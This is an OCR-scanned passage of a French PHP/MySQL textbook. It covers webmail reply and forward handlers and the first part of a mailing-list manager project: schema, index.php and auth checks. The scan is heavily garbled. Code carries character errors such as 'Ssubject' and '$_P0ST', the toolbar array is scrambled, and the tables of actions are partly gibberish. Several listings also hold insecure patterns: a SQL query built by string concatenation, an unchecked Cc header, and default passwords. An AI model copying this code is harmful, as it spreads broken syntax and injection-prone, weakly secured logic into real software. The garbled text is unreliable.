case ' new-message ' : 

display_new_message_f orm($_SESSION[ 1 auth_user 1 ] , 

$to, $cc, $subject, $body); 

break 

Le formulaire d'envoi d'un nouveau message n'est, en fait, qu'un formulaire d'envoi de 
courrier. II est semblable a celui presente a la Figure 27.8. En realite, cette figure repre- 
sente un message a faire suivre, pas l'envoi d'un nouveau message, mais le formulaire 
est le meme. Nous aborderons un peu plus loin les envois associes a des reponses et a 
des messages "a faire suivre". 



Figure 27.8 
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Lorsque l'utilisateur clique sur le bouton Send Message, Taction "send message" est 
selectionnee, ce qui execute le code suivant : 

case ' send-message 1 : 

if (send_message($to, $cc, Ssubject, $message)) { 

echo "<p style=\ "padding-bottom: 1 00px\ ">Message sent.</p>"; 
} else { 

echo "<p style=\ "padding-bottom: 100px\ ">Could not send 
message. </p>" ; 

} 

break; 
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Ce code appelle la fonction send message ( ) , qui envoie le message et dont le code est 
presente dans le Listing 27.12. 

Listing 27.12 : La fonction send_message() de mail_fns.php — Cette fonction envoie le 
message saisi par I'utilisateur 



function send_message($to, $cc, $subject, $message) { 
// Envoie un courrier par PHP 

if ( !$conn=db_connect ( ) ) { 
return false; 

} 

$query = "select address from users 

where username=' " .$_SESSI0N[ 'auth_user' ] ; 

$result = $conn->query ($query) ; 
if (!$result) { 

return false; 
} else if ($result->num_rows==0) { 

return false; 
} else { 

$row = $result->fetch_object() ; 
$other = 'From: ' . $row->address ; 
if ( !empty($cc) ) { 

$other.=" \r\nCc: $cc"; 

} 

if (mail($to, $subject, $message, $other)) { 

return true; 
} else { 

return false; 

} 

} 

} 



Comme vous pouvez le constater, cette fonction se sert de mail ( ) pour envoyer le cour- 
rier. Elle commence cependant par charger l'adresse electronique de I'utilisateur dans 
la base de donnees pour la recopier dans le champ From du message. 

Repondre a un message ou le faire suivre 

Les fonctions Reply, Reply All et Forward envoient toutes un message, comme New 
Message. Leurs differences resident dans les elements qui sont recopies dans le 
nouveau message avant de l'afficher. Revenons a la Figure 27.8. Le contenu du 
message auquel nous repondons a ete indente avec le symbole > et la ligne Subject 
commence par Re:. De meme, les options Forward et Reply All remplissent les destina- 
taires, le sujet du message et indentent son contenu. 
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Le code correspondant est active dans la section principale de index.php : 

case ' reply-all ' : 

// Definit cc comme ancienne ligne cc 
if(!$imap) { 

$imap = open_mailbox($_SESSION[ ' auth_user ' ] , 

S_SESSI0N[ ' selected_account ' ] ) ; 

} 

if($imap) { 
$header = imap_header($imap, $messageid); 

if ($header->reply_toaddress) { 

$to = $header->reply_toaddress; 
} else { 

$to = $header->f romaddress ; 

} 

$cc = $header->ccaddress; 

$subject = "Re: " .$header->subject; 

$body = add_quoting(stripslashes(imap_body ($imap, $messageid) ) ) ; 
imap_close($imap) ; 

display_new_message_f orm($_SESSION[ 1 auth_user ' ] , 

$to, $cc, $subject, $body); 

} 

break ; 

case ' reply ' : 

// Definit l'adresse 'to' comme l'adresse 'reply-to' ou 'from' du 
// message courant 
if(!$imap) { 

$imap = open_mailbox($_SESSION[ 'auth_user' ] , 

$_SESSI0N[ ' selected_account ' ] ) ; 

} 

if($imap) { 
$header = imap_header ($imap, $messageid); 
if ($header->reply_toaddress) { 

$to = $header->reply_toaddress; 
} else { 

$to = $header->f romaddress; 

} 

$subject = "Re: " .$header->subject; 

$body = add_quoting(stripslashes(imap_body ($imap, $messageid) ) ) ; 
imap_close($imap) ; 

display_new_message_f orm($_SESSION[ ' auth_user ' ] , 

$to, $cc, $subject, $body); 

} 

break; 

case ' forward ' : 

// Met le corps du message courant sous forme de citation 
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if(!$imap) { 

$imap = open_mailbox($_SESSION[ ' auth_user ' ] , 
S_SESSION[ ' selected_account ' ] ) ; 

} 

if($imap) { 
$header = imap_header($imap, $messageid) ; 

$body = add_quoting(stripslashes(imap_body ($imap, $messageid) ) ) ; 
$subject = "Fwd: " . $header->subject; 
imap_close($imap) ; 

display_new_message_f orm($_SESSION[ 1 auth_user ' ] , 

$to, $cc, Ssubject, $body); 

} 

break ; 

Vous remarquerez que chacune de ces options definit les en-tetes appropries, formate 
les informations et appelle la fonction display new message form() pour afficher le 
formulaire. 

Notre etude des fonctionnalites d'une application de webmail est desormais complete. 

Pour aller plus loin 

Ce projet peut etre ameliore de plusieurs facons. Vous pouvez vous inspirer du 
programme que vous utilisez habituellement pour lire votre courrier mais nous pouvons 
deja vous suggerer quelques ameliorations : 

■ Permettre aux utilisateurs de s'enregistrer directement sur le site. Vous pouvez par 
exemple reprendre une partie du code du Chapitre 25. 

■ Offrir la possibility aux utilisateurs d' avoir plusieurs adresses. La plupart des utili- 
sateurs possedent plusieurs adresses e-mail. En deplacant leur adresse e-mail de la 
table users vers la table accounts, vous pouvez leur permettre d'utiliser simultane- 
ment plusieurs adresses. II faudra egalement modifier un peu de code. Le formulaire 
d'envoi devra notamment posseder un menu deroulant pour selectionner l'adresse a 
utiliser. 

■ Permettre d'envoyer, de recevoir et de lire des courriers contenant des pieces jointes. 
Si vous donnez la possibilite aux utilisateurs d'envoyer des pieces jointes, vous 
devrez egalement ajouter une fonction de depot de fichier, comme nous l'avons vu 
au Chapitre 17. L'envoi des courriers avec pieces jointes sera etudie au Chapitre 28. 

L Ajouter la possibilite d'utiliser un carnet d' adresses. 

■ Permettre aux utilisateurs de lire les news. La lecture sur un serveur NNTP a l'aide 
des fonctions IMAP est quasiment identique a la lecture d'une boite aux lettres 
puisqu'il suffit de preciser un autre numero de port et un autre protocole dans 
l'appel a imap open(). Au lieu de donner le nom d'une boite aux lettres comme 
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INBOX, il faut ensuite fournir le nom d'un forum de discussion. Vous pouvez combi- 
ner cette possibilite avec une structuration en fils de discussion, que nous aborderons 
au Chapitre 29. 



Pour la suite 

Dans le prochain chapitre, nous implementerons un autre projet lie au courrier elec- 
tronique : une application permettant d'envoyer des lettres d'information portant sur 
differents sujets aux personnes qui se seront enregistrees sur notre site. 



28 



Implementation d'un gestionnaire 

de listes de diffusion 

Si vous avez construit une liste des personnes qui se sont inscrites sur votre site, il peut 
etre interessant de rester en contact avec elles en leur envoyant regulierement un bulle- 
tin d'informations. Dans ce chapitre, nous allons implementer une interface pour un 
gestionnaire de listes de diffusion (ou MLM, Mailing List Manager). Certains gestion- 
naires de listes de diffusion permettent a n'importe quelle personne de la liste d'envoyer 
des messages aux autres personnes de la liste, mais notre programme sera simplement 
un systeme permettant a l'administrateur de la liste d'envoyer des messages aux 
personnes inscrites dans cette liste. Nous avons choisi de l'appeler Pyramid-MLM. 

Ce systeme sera comparable a certains produits qui existent deja sur le marche. Pour 
avoir une idee du but que nous recherchons, nous vous suggerons de visiter le site 
http://www.topica.com/. 

Notre application permet a un administrateur de creer plusieurs listes de diffusion et 
d'envoyer des bulletins d'informations differents a chacune de ces listes. Elle se sert 
notamment d'un systeme de telechargement de fichiers pour permettre a l'administra- 
teur de telecharger une version texte et une version HTML de son bulletin d'informa- 
tions, qu'il peut done creer en n'etant pas connecte. Cela signifie que les 
administrateurs peuvent se servir de n'importe quel logiciel pour creer leurs messages. 

Les utilisateurs peuvent s'inscrire a n'importe quelle liste de notre site et indiquer s'ils 
souhaitent recevoir les bulletins au format texte ou en HTML. 

Composants de la solution 

Nous souhaitons implementer un systeme de saisie et d'envoi de bulletins d'informa- 
tions en ligne. Ce systeme doit permettre de creer differents bulletins d'informations 
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qui seront envoyes aux utilisateurs et donner aux utilisateurs la possibility de s'inscrire 
a un ou a plusieurs bulletins d' informations. 

Plus precisement, voici la liste des fonctionnalites que nous devons implementer dans 
notre systeme : 

■ Les administrateurs doivent pouvoir configurer et modifier des listes de diffusion. 

■ Les administrateurs doivent pouvoir envoyer des bulletins aux formats texte et 
HTML a toutes les personnes inscrites a une liste de diffusion. 

■ Les utilisateurs doivent pouvoir s'enregistrer pour utiliser le site, saisir et modifier 
leurs informations personnelles. 

■ Les utilisateurs doivent pouvoir s'inscrire a n'importe quelle liste du site. 

■ Les utilisateurs doivent pouvoir annuler leur inscription a une liste. 

■ Les utilisateurs devraient pouvoir choisir entre les formats texte ou HTML. 

■ Pour des raisons de securite, les utilisateurs ne doivent pas pouvoir envoyer des e-mails 
aux personnes de leur liste ou obtenir les adresses e-mail de ces personnes. 

■ Les utilisateurs et les administrateurs doivent pouvoir afficher les informations sur 
chacune des listes de diffusion. 

■ Les utilisateurs et les administrateurs doivent pouvoir afficher les anciens bulletins 
d' informations envoyes a une liste (c'est-a-dire l'archive de la liste). 

Maintenant que nous connaissons les objectifs, nous pouvons concevoir la solution et 
ses composants, comme la configuration d'une base de donnees des listes, d'abonnes 
et de bulletins archives, le transfert de bulletins d' informations crees hors ligne et 
l'envoi d'e-mails avec des pieces jointes. 

Configuration de la base de donnees 

Nous devons enregistrer le nom d'utilisateur et le mot de passe de chaque utilisateur de 
notre systeme, ainsi qu'une liste des listes de diffusion auxquelles il s'est abonne. Nous 
devons egalement enregistrer les preferences de chaque utilisateur en ce qui concerne le 
format des bulletins (texte ou HTML), afin de pouvoir lui envoyer la version appropriee. 

Un administrateur est un utilisateur particulier qui peut creer de nouvelles listes de 
diffusion et envoyer des bulletins d' informations a ces listes. 

II peut etre interessant d' implementer un systeme d'archivage des bulletins d'informa- 
tions. En effet, il se peut que les abonnes ne conservent pas tous les bulletins qu'ils 
recoivent, mais ils peuvent avoir envie de retrouver un vieil article. Un archivage est 
egalement un bon outil publicitaire pour la liste de diffusion, puisque les abonnes 
potentiels peuvent ainsi voir de quoi elle parle. 
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La configuration de cette base de donnees avec MySQL et son interface en PHP n'a rien 
de tres difficile. 

Transfert des f ichiers 

Nous avons besoin d'une interface permettant aux administrateurs d'envoyer des bulle- 
tins, comme nous 1' avons deja vu. Mais nous n' avons pas encore explique comment les 
administrateurs pourront creer ces bulletins. Nous pourrions leur proposer un formu- 
laire dans lequel ils pourraient saisir ou recopier le contenu de leurs bulletins, mais il 
serait plus agreable de leur permettre de creer un bulletin avec leur editeur de texte 
favori et de transferer ensuite le fichier produit sur le serveur web. Cette approche offre 
aussi aux administrateurs la possibilite d'ajouter des images dans un bulletin HTML. 
Pour implementer cette fonctionnalite, nous pouvons recuperer le mecanisme de transfert 
de fichiers presente au Chapitre 17. 

Nous devons cependant utiliser un formulaire legerement plus complexe que celui 
auquel nous avons eu recours. En effet, l'administrateur doit pouvoir transferer a la fois 
la version texte et la version HTML de son bulletin, ainsi que toutes les images accom- 
pagnant la version HTML. 

Apres avoir depose le bulletin sur le serveur, nous devons creer une interface permettant 
a l'administrateur de previsualiser ce bulletin avant de 1' envoy er. II pourra ainsi verifier 
que tous les fichiers ont ete correctement transferes. 

Notez que nous conserverons tous ces fichiers dans un repertoire d' archive afin que les 
utilisateurs puissent consulter les editions precedentes du bulletin. II faut que ce repertoire 
soit accessible en denture a l'utilisateur sous le compte duquel le serveur web s'execute. 
Le script de transfert de fichiers ecrira les bulletins dans ./archive/ : vous devez done vous 
assurer que les permissions de ce repertoire ont ete correctement definies. 

Envoyer des e-mails incluant des pieces jointes 

Pour ce projet, nous devons pouvoir envoyer aux utilisateurs un bulletin en texte brut ou 
une version HTML, plus agreable, en fonction de leurs preferences. 

Pour envoyer un fichier HTML contenant des images, nous devons disposer d'un 
moyen permettant d'envoyer des pieces jointes, or la fonction mail ( ) de PHP ne prend 
pas facilement en charge les pieces jointes. Nous preferons done utiliser l'excellent 
paquetage Mail_Mime de PEAR, cree par Richard Heyes, qui sait gerer sans probleme 
les pieces jointes HTML. 

Les instructions d' installation de ce paquetage sont presentees dans 1' Annexe A, dans la 
section consacree a l'installation de PEAR. 
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Presentation de la solution 

Pour ce projet, nous utiliserons a nouveau une approche par evenements, comme nous 
l'avons fait au Chapitre 27. 

Nous commencerons une fois de plus par dessiner un ensemble de diagrammes de flux 
mettant en evidence les chemins par lesquels peuvent passer les utilisateurs du systeme. 
Ici, nous avons dessine trois diagrammes pour representer les trois ensembles d' interac- 
tions possibles des utilisateurs avec le systeme. Les actions autorisees sont en effet 
differentes selon que l'utilisateur ne s'est pas authentifie, qu'il s'est authentifie en tant 
qu'utilisateur normal ou en tant qu'administrateur. Ces actions sont representees, 
respectivement, par les Figures 28.1, 28.2 et 28.3. 

A la Figure 28.1, vous pouvez voir les actions possibles pour les utilisateurs qui ne se 
sont pas encore authentines. Comme vous pouvez le constater, l'utilisateur peut 
s'authentifier (s'il possede deja un compte), creer un compte (s'il n'en possede pas deja 
un) ou afficher les listes de diffusion existantes. 

Figure 28. 1 
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La Figure 28.2 presente les actions disponibles pour les utilisateurs authentines. Ceux- 
ci peuvent modifier la configuration de leur compte (adresse e-mail et preferences), 
changer leur mot de passe et modifier les listes auxquelles ils sont inscrits. 



Figure 28.2 
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La Figure 28.3 presente les actions que peuvent choisir les administrateurs authentines. 
Comme vous pouvez le constater, un administrateur possede la plupart des fonctionna- 
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lites des utilisateurs normaux, plus certaines autres. II peut egalement creer de nouvel- 
les listes de diffusion, creer de nouveaux messages pour une liste de diffusion en 
telechargeant des fichiers et previsualiser les messages avant de les envoyer. 



Figure 28.3 
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Comme nous avons choisi une approche par evenements, le cceur de 1' application se 
trouve dans un seul fichier, index.php, qui appelle un ensemble de bibliotheques de 
fonctions. Le Tableau 28.1 recapitule les fichiers intervenant dans cette application. 



Tableau 28.1 : Les fichiers du gestionnaire de listes de diffusion 



Nom du fichier 


Type 


Description 


index . php 


Application 


Le script principal qui execute 1' application. 


include fns.php 


Fonctions 


Ensemble de fichiers a inclure pour cette application. 


data valid fns.php 


Fonctions 


Ensemble de fonctions pour valider les donnees 
d'entree. 


db fns.php 


Fonctions 


Ensemble de fonctions pour se connecter a la base de 
donnees mlm. 


mlm fns.php 


Fonctions 


Ensemble de fonctions specifiques a cette application. 


output fns.php 


Fonctions 


Ensemble de fonctions de generation du code HTML. 


upload . php 


Composant 


Script qui gere le composant de transfert des fichiers 
pour l'administrateur. 11 est separe pour des raisons de 
securite. 


user auth fns.php 


Fonctions 


Ensemble de fonctions pour authentifier les utilisateurs. 


create database. sql 


SQL 


Code SQL pour configurer la base de donnees mlm, un 
utilisateur web et un administrateur. 
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Nous allons maintenant nous interesser a 1' implementation de ce projet, en commen- 
cant par la base de donnees dans laquelle nous enregistrerons les informations concernant 
les abonnes et les listes. 



Configuration de la base de donnees 

Pour cette application, nous devons enregistrer les informations suivantes : 

■ Lists. Listes de diffusion auxquelles les utilisateurs peuvent s'inscrire. 

■ Subscribers. Utilisateurs du systeme et leurs preferences. 

■ Sub_lists. Mise en relation des utilisateurs et des listes auxquelles ils se sont inscrits 
(relation plusieurs-vers-plusieurs). 

■ Mail. Enregistrement des e-mails qui ont ete envoyes. 

■ Images. Comme nous souhaitons pouvoir envoyer des e-mails contenant plusieurs 
fichiers (c'est-a-dire une version texte, une version HTML et un certain nombre 
d'images), nous devons egalement enregistrer les images accompagnant chaque 
e-mail. 

Le code SQL que nous avons ecrit pour creer cette base de donnees est presente dans le 
Listing 28.1. 

Listing 28.1 : create jdatabase.sql — Le code SQL de creation de la base de donnees 
mlm 



create database mlm; 
use mlm; 

create table lists 
( 

listid int auto_increment not null primary key, 
listname char(20) not null, 
blurb varchar(255) 

); 

create table subscribers 
( 

email char(100) not null primary key, 
realname char(100) not null, 
mimetype char(1) not null, 
password char(16) not null, 
admin tinyint not null 

); 

# Relation entre un utilisateur et une liste 

create table sub_lists 

( 
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email char(100) not null, 
listid int not null 

); 

create table mail 
( 

mailid int auto_increment not null primary key, 

email char(100) not null, 

subject char(100) not null, 

listid int not null, 

status char(10) not null, 

sent datetime, 

modified timestamp 

); 

# Images associees a un courrier. 

create table images 

( 

mailid int not null, 
path char(100) not null, 
mimetype char(100) not null 

); 

grant select, insert, update, delete 
on mlm.* 

to mlm@localhost identified by 'password'; 
insert into subscribers values 

( ' admin@localhost ' , 'Administrative User', 'H', shal (' admin ') , 1); 



Vous pouvez executer ce programme SQL en saisissant la commande suivante : 

mysql -u root -p < create_database . sql 

Vous devrez naturellement saisir le mot de passe root. Vous pouvez bien sur executer 
ce script sous le nom de n'importe quel utilisateur MySQL possedant les privileges 
appropries, mais nous nous sommes servis du compte root pour des raisons de simpli- 
cite. N'oubliez pas non plus de modifier le mot de passe de l'utilisateur mlm et de 
l'administrateur dans votre script avant de 1' executer. 

Certains champs de cette base de donnees meritent quelques explications. 

La table lists contient des identificateurs et des noms de listes dans les colonnes 
listid et listname. Elle contient aussi une colonne blurb correspondant a la description 
de chaque liste. 

La table subscribers contient l'adresse e-mail (email) et le nom (realname) des abon- 
nes. Elle stocke egalement leur mot de passe (password) et une option (admin) qui indi- 
que si 1' utilisateur est un administrateur ou non. Elle contient le format des bulletins a 
envoyer (mimetype). Cette colonne peut valoir H pour des bulletins en HTML ou T pour 
des bulletins en texte brut. 
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La table sublists contient l'adresse e-mail (email) de la table subscribers et les iden- 
tificateurs de liste listid de la table lists. 

La table mail contient des informations sur chaque message e-mail envoye par le systeme. 
Elle stocke un identificateur unique (mailid), l'adresse a partir de laquelle le message 
e-mail a ete envoye (email), la ligne de sujet de l'e-mail (subject) et 1' identificateur 
listid de la liste a laquelle il a ete envoye ou doit etre envoye. Le contenu du message, 
en texte ou en HTML, peut etre un fichier assez volumineux, c'est pourquoi nous enre- 
gistrons 1' archive des messages en dehors de la base de donnees. Nous conserverons 
egalement certaines informations generales : si le message a ete envoye (status), a 
quel moment il a ete envoye (sent) et la date de la derniere modification de cet enregis- 
trement (modified). 

Pour terminer, nous utilisons la table images pour conserver une trace des images asso- 
ciees aux messages HTML. Une fois encore, ces images pouvant etre assez volumineu- 
ses, nous les enregistrons en dehors de la base de donnees. Cependant, nous stockons 
1' identificateur du message (mailid) auquel elle est associee, l'emplacement path ou 
cette image est enregistree et le type MIME de l'image (mimetype), par exemple image/ 
gif. 

Le code SQL du Listing 28.1 configure egalement un utilisateur sous le compte duquel 
PHP pourra se connecter a la base, ainsi qu'un administrateur pour le systeme. 

Architecture du script 

Comme pour le projet precedent, nous avons choisi une approche par evenements pour 
ce projet. Le coeur de 1' application se trouve dans le fichier index.php, qui est compose 
de quatre parties principales : 

1. Le pretraitement effectue tous les traitements necessaries avant d'envoyer les en- 
tetes. 

2. L installation et l'envoi des en-tetes creent et envoient le debut de la page HTML. 

3. L' execution de Taction repond a l'evenement recu. Comme dans l'exemple precedent, 
l'evenement se trouve dans la variable $action. 

4. L'envoi des pieds de pages. 

Bien que l'essentiel du traitement soit effectue dans ce fichier, 1' application se sert 
egalement des bibliotheques de fonctions presentees au Tableau 28.1, comme nous 
1' avons vu precedemment. 

Le code source complet du script index.php est presente dans le Listing 28.2. 
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Listing 28.2 : index.php — Le fichier principal de Pyramid-MLM 



<?php 

/**************************************************************** 

* Section 1 : pretraitement 

***************************************************************** / 

include ( ' include_f ns . php ' ) ; 
session_start ( ) ; 

$action = $_GET[ ' action '] ; 
$buttons = array ( ) ; 

// Completer cette chaine s'il faut traiter quoi que ce soit 
// avant d'envoyer les en-tetes. 
$status = ' ' ; 

// On doit traiter les requetes de connexion et de deconnexion 
// avant toute chose. 

if ( ($_POST[ 'email' ]) && ($_POST[ ' password ']) ) { 

$login = login ($_P0ST[ 'email' . j, $_P0ST[ ' password ']) ; 

if($login == 'admin') { 
$status .= "<p style=\ "padding-bottom: 50px\"> 

<strong>" .get_real_name($_POST[ 'email' ] ) . "</strong> 
logged in successfully as 
<strong>Administrator</strong> .</p>" ; 
$_SESSION[ ' admin_user ' ] = $_P0ST[ ' email '] ; 

} else if($login == 'normal') { 
Sstatus .= "<p style=\ "padding-bottom: 50px\"> 

<strong>" .get_real_name($_POST[ 'email' ] ) . "</strong> 
logged in successfully. </p>" ; 
$_SESSION[ 'normal_user' ] = $_P0ST[ ' email '] ; 

} else { 

$status .= "<p style=\ "padding-bottom: 50px\ ">Sorry , we 
could not log you in with that email address 
and password . </p>" ; 

} 

} 

if($action == 'log-out') { 
unset ($action) ; 
$_SESSION=array() ; 
session_destroy ( ) ; 

} 

/***************************************************************** 

* Section 2 : Configuration et affichage des en-tetes 
***************************************************************** / 

// Cree les boutons qui apparaitront dans la barre d'outils 
if (check_normal_user( ) ) { 

// Cas d'un utilisateur normal 

$buttons[0] = 'change-password'; 

$buttons[1] = 'account-settings'; 

$buttons[2] = ' show-my-lists ' ; 
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$buttons[3] = 'show-other-lists 
$buttons[4] = 'log-out'; 
} else if (check_admin_user( ) ) { 
// Cas d'un administrateur 

' change-password ' 



$buttons[0] 
$buttons[1 ] 
$buttons[2] 
$buttons[3] 
$buttons[4] 
$buttons[5] 
$buttons[6] 
$buttons[7] 
} else { 

// Cas d'un utilisateur non authentifie 
$buttons[0] = 'new-account'; 
$buttons[1] = 'show-all-lists'; 
$buttons[4] = 'log-in'; 

} 



' create-list ' . 
' create-mail ' ; 
' view-mail ' ; 
' log-out ' ; 
' show-all-lists ' ; 
' show-my-lists ' ; 
' show-other-lists ' 



if ($action) { 

// Affiche un en-tete contenant le nom de 1 ' application et la 
// description de la page ou de l'action. 
do_html_header( ' Pyramid-MLM - ' .format_action($action) ) ; 
} else { 

// Affiche un en-tete ne contenant que le nom de 1 ' application 
do_html_header( ' Pyramid-MLM ' ) ; 

} 

display_toolbar($buttons) ; 

// Affiche le texte produit par les fonctions appelees avant 
// la production de l'en-tete. 
echo $status; 

* Section 3 : Execution de l'action 



// Un visiteur non authentifie n'a droit qu'a ces actions, 
switch ($action) { 
case ' new-account ' : 

// get rid of session variables 
session_destroy ( ) ; 
display_account_f orm( ) ; 
break; 

case 'store-account': 

if (store_account($_SESSION[ ' normal_user ' ] , 
$_SESSI0N[ 'admin_user' ] , $_P0ST)) { 
$action = ' ' ; 

} 



if ( ! check_logged_in( ) ) { 

display_login_f orm($action) ; 

} 

break; 



case 'log-in 
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case : 

if ( ! check_logged_in( ) ) { 

display_login_f orm($action) ; 

} 

break; 

case 'show-all-lists': 

display_items( 'All Lists', get_all_lists( ) , 'information', 
' show-archive ',''); 

break; 

case 'show-archive': 

display_items( 'Archive For ' .get_list_name($_GET[ ' id ' ] ) , 
get_archive ($_GET[ ' id ' ] ) , ' view-html ' , 
' view-text ' , ' ' ) ; 

break; 

case ' information 1 : 

display_inf ormation ($_GET[ ' id ' ] ) ; 
break; 

} 

// Toutes les autres actions exigent une authentif ication . 
if (check_logged_in ( ) ) { 
switch ($action) { 

case 'account-settings': 
display_account_f orm(get_email( ) , 
get_real_name(get_email( ) ) , 
get_mimetype(get_email( ) ) ) ; 

break; 

case 'show-other-lists': 
display_items ( ' Unsubscribed Lists ' , 

get_unsubscribed_lists(get_email( ) ) , 
' information ' , ' show-archive ' , 
' subscribe ' ) ; 

break; 

case ' subscribe ' : 
subscribe(get_email( ) , $_GET[ ' id ' ] ) ; 
display_items ( ' Subscribed Lists ' , 
get_subscribed_lists(get_email( ) ) , ' information ' , 

'show-archive', 'unsubscribe'); 

break; 

case ' unsubscribe ' : 

unsubscribe (get_email ( ) , $_GET[ ' id ' ] ) ; 
display_items ( ' Subscribed Lists ' , 
get_subscribed_lists(get_email( ) ) , ' information ' , 

'show-archive', 'unsubscribe'); 

break ; 
case ' ' : 

case ' show-my-lists ' : 

display_items ( ' Subscribed Lists ' , 
get_subscribed_lists(get_email( ) ) , 

'information', 'show-archive', 'unsubscribe') 

break; 
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case 'change-password': 

display_password_f orm( ) ; 
break; 

case 'store-change-password': 

if (change_password(get_email( ) , $_P0ST[ 'old_passwd' ] , 
$_P0ST[ 'new_passwd' ] , $_P0ST[ ' new_passwd2 ' ] ) ) { 
echo "<p style=\"padding-bottom: 50px\">OK: Password 
changed . </p>" ; 

} else { 

echo "<p style=\"padding-bottom: 50px\ ">Sorry , your 

password could not be changed. </p>" ; 
display_password_form( ) ; 

} 

break; 

} 

} 

// Seul un administrateur peut executer les actions suivantes. r 
if (check_admin_user( ) ) { 
switch ($action) { 
case ' create-mail ' : 

display_mail_f orm(get_email( ) ) ; 
break; 

case ' create-list ' : 

display_list_f orm(get_email( ) ) ; 
break; 

case ' store-list ' : 

if (store_list($_SESSION[ 'admin_user' ] , $_P0ST)) { 
echo "<p style=\"padding-bottom: 50px\">New list 

added. </p>" ; 
display_items( 'All Lists', get_all_lists( ) , 

' information ' , ' show-archive ',''); 

} else { 

echo "<p style=\"padding-bottom: 50px\">List could not 
be stored. Please try again. </p>"; 

} 

break ; 

case ' send ' : 

send($_GET[ 'id' ] , $_SESSION[ ' admin_user ' ] ) ; 
break; 

case ' view-mail ' : 

display_items( 'Unsent Mail', get_unsent_mail(get_email( ) ) , 
' preview-html ' , 'preview-text', 'send'); 

break; 

} 

} 

/***************************************************************** 
* Section 4 : Affichage du pied de page 

***************************************************************** j 
do_html_f ooter( ) ; 

?> 
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Vous pouvez voir que les quatre parties de ce script sont clairement delimitees dans le 
listing. Dans la phase de pretraitement, nous configurons la session et nous traitons 
toutes les actions qui doivent etre effectuees avant d'envoyer les en-tetes, c'est-a-dire 
les connexions et les deconnexions. 

Dans la phase d'en-tete, nous configurons les boutons du menu dont l'utilisateur pourra 
se servir et nous affichons les en-tetes appropries a l'aide de la fonction 
do html header () de output Jns.php. Cette fonction se contente d'afficher la barre 
d'en-tete et les menus, c'est pourquoi nous ne l'etudierons pas plus en detail. 

Dans la section principale du script, nous reagissons a Taction selectionnee par l'utili- 
sateur. Ces actions sont regroupees en trois ensembles : les actions qui peuvent etre 
effectuees si l'utilisateur n'est pas authentifie, celles qui peuvent etre executees par des 
utilisateurs normaux et celles reservees aux administrateurs. Nous verifions si nous 
pouvons acceder aux deux derniers ensembles d' actions avec les fonctions 
check logged in()et check admin user (), qui sont definies dans la bibliotheque de 
fonctions user_auth_fns.php. Le code de ces fonctions et celui de la fonction 
check normal user () sont presentes dans le Listing 28.3. 

Listing 28.3 : Les fonctions de user_auth_fns.php — Elles verifient qu'un utilisateur 
s'est authentifie et a quel niveau 



function check_normal_user( ) { 

// Verifie que l'utilisateur s'est authentifie et l'avertit dans le cas 
contraire . 

if (isset($_SESSION[ 1 normal_user ' ] ) ) { 

return true; 
} else { 

return false; 

} 

} 

function check_admin_user ( ) { 

// Verifie que l'utilisateur s'est authentifie et l'avertit dans le cas 
contraire. 

if (isset($_SESSION[ 1 admin_user ' ] ) ) { 

return true; 
} else { 

return false; 

} 

} 



Comme vous pouvez le constater, ces fonctions se servent des variables de session 
normal user et admin user pour verifier que l'utilisateur est authentifie. Nous reviendrons 
sur la definition de ces variables de session dans un instant. 
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Dans la derniere section de ce script, nous envoyons un pied de page HTML avec la 
fonction do html f ooter( ) de output _fns.php. 

Examinons rapidement les differentes actions possibles dans notre systeme. Ces actions 
sont presentees dans le Tableau 28.2. 



Tableau 28.2 : Les actions possibles du gestionnaire de listes de diffusion 



Action 


Utilisable par 


Description 


log in 


N'importe qui 


A CC 1 £ 1 ' J 

Atfiche un lormulaire de connexion. 


log out 


N'importe qui 


Ferme la session. 


new account 


N'importe qui 


Cree un nouveau compte pour un utilisateur. 


store account 


N'importe qui 


Enregistre les informations du compte. 


show all lists 


N'importe qui 


Affiche la liste des listes de diffusion disponibles. 
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ollUW dl L-MXVfcJ 


\l imnnftf /"ini 
IN IIHUUIIC ULll 


A TTn / * r\ o 1 ci o r\nl 1 «ti »i c orpnnfpc r\ una lict^* 
/A.U1C11C ICS LmllCLlllS al L.111VCS U U11C IISIG 

particuliere. 


XIII Ul IHcLL-LUII 


l\T imnfirtfl nni 
IN 1111UUIIC ULll 


A "f"*"i~i / * h ^» 1 oi o infni"m'itir\nc crf^n i^i'ci 1 c H'nnp lictf* 
rtllldiC ICS illlUI Ilia UUlla yCllClalCS U U11G LlSLC, 


account settings 


Les utilisateurs 

a 1 1 th PTi ti fi p*» 
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Affiche les parametres d'un compte utilisateur. 


show other lists 


Les utilisateurs 

dllllieillllies 


Affiche les listes de diffusion auxquelles 
i UQiisdieur ii csl pas auoiiiie. 


show my lists 


Les utilisateurs 

qii frhfanfri r\ 
aUlllCllLlllCS 


Affiche les listes de diffusion auxquelles 
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subscribe 


Les utilisateurs 
auuieii lines 


Abonne un utilisateur a une liste de diffusion. 


unsubscribe 


Les utilisateurs 
authentifies 


Annule l'inscription d'un utilisateur a une liste de 
diffusion. 


change password 


Les utilisateurs 
authentifies 


Affiche le formulaire de changement du mot de 
passe 


store change 
password 


Les utilisateurs 
authentifies 


Met a jour le mot de passe d'un utilisateur. 


create mail 


Les administrateurs 


Affiche un formulaire permettant de deposer des 
bulletins. 


create list 


Les administrateurs 


Affiche un formulaire pour creer de nouvelles 
listes de diffusion. 


store list 


Les administrateurs 


Enregistre les details d'une liste de diffusion dans 
la base de donnees. 
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Tableau 28.2 : Les actions possibles du gestionnaire de listes de diffusion (suite) 



Action 


Utilisable par 


Description 


view mail 


Les administrateurs 


Affiche les bulletins qui ont ete deposes, mais pas 






envoyes. 


send 


Les administrateurs 


Envoie les bulletins aux abonnes. 



Vous remarquerez qu'il manque une option permettant de deposer les bulletins saisis 
par les administrateurs avec create mail. En fait, cette fonctionnalite se trouve dans un 
autre fichier, upload.php. Nous l'avons placee dans un autre fichier parce que cela nous 
permet, a nous autres programmeurs, d'isoler plus facilement les risques de securite. 

Nous allons maintenant voir comment implementer les actions des trois groupes 
presentes au Tableau 28.2, c'est-a-dire les actions qui peuvent etre effectuees par 
n'importe qui, les actions reservees aux utilisateurs authentifies et les actions reservees 
aux administrateurs. 

Implementation de la connexion 

Lorsqu'un nouvel utilisateur arrive sur notre site, il y a trois choses que nous aimerions qu'il 
fasse. Tout d'abord, regarder ce que nous avons a offrir. Ensuite, s'enregistrer sur notre site. 
Et, enfin, s'authentifier sur le site. Nous allons maintenant examiner chacune de ces actions. 

A la Figure 28.4, vous pouvez voir la page d'accueil que nous presentons aux utilisa- 
teurs lors de leur premiere visite de notre site. 

Figure 28.4 

Lorsqu'un utilisateur 
arrive sur notre site, 
il peut creer un nouveau 
compte, afficher les listes 
